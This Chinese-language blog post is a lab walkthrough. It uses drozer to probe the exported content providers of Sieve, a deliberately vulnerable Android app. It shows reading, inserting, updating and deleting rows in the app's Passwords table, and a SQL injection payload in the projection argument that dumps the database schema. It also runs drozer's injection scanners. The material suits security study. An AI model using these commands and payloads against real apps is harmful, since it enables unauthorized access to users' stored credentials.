Test Sieve - content providers exported - DB Based

Posted on 2024-06-04 | Post modified | In Tools/Others/Android Related/Drozer/Test Sieve |

Test Sieve - content providers exported - DB Based

如果想知道實際的狀況和content URI是什麼，可以參考ChatGPT的說明

起手式從以下command的結果可以知道com.mwr.example.sieve.DBContentProvider和com.mwr.example.sieve.FileBackupProvider的狀況，並且從結果可以知道URI的形式長怎樣

 content://com.mwr.example.sieve.DBContentProvider/Keys/
 content://com.mwr.example.sieve.DBContentProvider/Passwords/
 content://com.mwr.example.sieve.DBContentProvider/Passwords

:::spoiler

 dz> run app.provider.info -a com.mwr.example.sieve
 Attempting to run shell module
 Package: com.mwr.example.sieve
   Authority: com.mwr.example.sieve.DBContentProvider
     Read Permission: null
     Write Permission: null
     Content Provider: com.mwr.example.sieve.DBContentProvider
     Multiprocess Allowed: True
     Grant Uri Permissions: False
     Uri Permission Patterns:
     Path Permissions:
       Path: /Keys
         Type: PATTERN_LITERAL
         Read Permission: com.mwr.example.sieve.READ_KEYS
         Write Permission: com.mwr.example.sieve.WRITE_KEYS
   Authority: com.mwr.example.sieve.FileBackupProvider
     Read Permission: null
     Write Permission: null
     Content Provider: com.mwr.example.sieve.FileBackupProvider
     Multiprocess Allowed: True
     Grant Uri Permissions: False
     Uri Permission Patterns:
     Path Permissions:
        
 dz> run scanner.provider.finduris -a com.mwr.example.sieve
 Attempting to run shell module
 Scanning com.mwr.example.sieve...
 No respone from content URI:      content://com.mwr.example.sieve.DBContentProvider/Keys
 No respone from content URI:      content://com.mwr.example.sieve.DBContentProvider/
 No respone from content URI:      content://com.mwr.example.sieve.DBContentProvider
 No respone from content URI:      content://com.mwr.example.sieve.FileBackupProvider
 No respone from content URI:      content://com.mwr.example.sieve.FileBackupProvider/
 Got a response from content Uri:  content://com.mwr.example.sieve.DBContentProvider/Keys/
 Got a response from content Uri:  content://com.mwr.example.sieve.DBContentProvider/Passwords/
 Got a response from content Uri:  content://com.mwr.example.sieve.DBContentProvider/Passwords

 For sure accessible content URIs:
   content://com.mwr.example.sieve.DBContentProvider/Keys/
   content://com.mwr.example.sieve.DBContentProvider/Passwords/
   content://com.mwr.example.sieve.DBContentProvider/Passwords

:::

逆向實際去看DBContentProvider這個class，會發現他把所有的query/update/delete/insert function都寫好了，不過我們可以先看初始化的時候onCreate在做的事情

 @Override // android.content.ContentProvider
 public boolean onCreate() {
     this.pwdb = new PWDBHelper(getContext());
     this.sUriMatcher.addURI("com.mwr.example.sieve.DBContentProvider", PWTable.TABLE_NAME, 100);
     this.sUriMatcher.addURI("com.mwr.example.sieve.DBContentProvider", "Keys", KEY);
     return false;
 }

再跟進去PWDBHelper，他主要就是管理 Android SQLite 資料庫的class，並進行初始化的動作，接著後續創了兩個table，包含==Passwords==和==Keys==(其實我覺得這個URI應該就類似database的table)

query/insert/update/delete/sqli

query

  #Simple Query
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
  Attempting to run shell module
       _id  1
   service
  username
  password  b'Fx3af9+6ytSadEhghd3Uw6hnlsJRr7ErQ8E=' (Base64-encoded)
     email  bernie6401@gmail.com

insert 根據上面的描述以及逆向的結果，我可以知道各個欄位的data type，insert的時候就是都加進去就可了

  dz> run app.provider.insert content://com.mwr.example.sieve.DBContentProvider/Passwords/ --integer _id 2 --string password bbb --string email aaa@bbb.com
  Attempting to run shell module
  Done.

  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
  Attempting to run shell module
       _id  1
   service
  username
  password  b'Fx3af9+6ytSadEhghd3Uw6hnlsJRr7ErQ8E=' (Base64-encoded)
     email  bernie6401@gmail.com

       _id  2
   service  null
  username  null
  password  bbb
     email  aaa@bbb.com

update _id=2的data，被我們改掉了

  dz> run app.provider.update content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "_id=?" --selection-args 2 --string password ccc --string email ddd@eee.com
  Attempting to run shell module
  Done.

  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
  Attempting to run shell module
       _id  1
   service
  username
  password  b'Fx3af9+6ytSadEhghd3Uw6hnlsJRr7ErQ8E=' (Base64-encoded)
     email  bernie6401@gmail.com

       _id  2
   service  null
  username  null
  password  ccc
     email  ddd@eee.com

delete 只剩下最一開始我們設定的data

  dz> run app.provider.delete content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "_id=?" --selection-args 2
  Attempting to run shell module
  Done.

  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
  Attempting to run shell module
       _id  1
   service
  username
  password  b'Fx3af9+6ytSadEhghd3Uw6hnlsJRr7ErQ8E=' (Base64-encoded)
     email  bernie6401@gmail.com

sqli 如下結果所示，的確存在sqli，並且可以得到完整的table

  # 先嘗試丟一些trash byte
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
  Attempting to run shell module
  Exception occured: unrecognized token: "')" (code 1 SQLITE_ERROR): , while compiling: SELECT * FROM Passwords WHERE (')
  dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords --projection "* FROM SQLITE_MASTER WHERE type='table';--"
  Attempting to run shell module
  | type  | name             | tbl_name         | rootpage | sql                                                                                              |
  | table | android_metadata | android_metadata | 3        | CREATE TABLE android_metadata (locale TEXT)                                                      |
  | table | Passwords        | Passwords        | 4        | CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email ) |
  | table | Key              | Key              | 5        | CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT )

我們也可以用drozer自動幫我們找

  dz> run scanner.provider.injection -a com.mwr.example.sieve
  Attempting to run shell module
  Scanning com.mwr.example.sieve...
  Not Vulnerable:
    content://com.mwr.example.sieve.DBContentProvider
    content://com.mwr.example.sieve.FileBackupProvider
    content://com.mwr.example.sieve.DBContentProvider/Keys
    content://com.mwr.example.sieve.DBContentProvider/
    content://com.mwr.example.sieve.FileBackupProvider/

  Injection in Projection:
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Keys/
    content://com.mwr.example.sieve.DBContentProvider/Passwords/

  Injection in Selection:
    content://com.mwr.example.sieve.DBContentProvider/Passwords
    content://com.mwr.example.sieve.DBContentProvider/Keys/
    content://com.mwr.example.sieve.DBContentProvider/Passwords/
        
  dz> run scanner.provider.sqltables -a com.mwr.example.sieve
  Attempting to run shell module
  Scanning com.mwr.example.sieve...
  Accessible tables for uri content://com.mwr.example.sieve.DBContentProvider/Passwords:
    android_metadata
    Passwords
    Key

  Accessible tables for uri content://com.mwr.example.sieve.DBContentProvider/Keys/:
    android_metadata
    Passwords
    Key

  Accessible tables for uri content://com.mwr.example.sieve.DBContentProvider/Passwords/:
    android_metadata
    Passwords
    Key

Post author: SBK6401
Post link: https://bernie6401.github.io/tools/others/android%20related/drozer/test%20sieve/2024/06/04/Test-Sieve-content-providers-exported-DB-Based/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.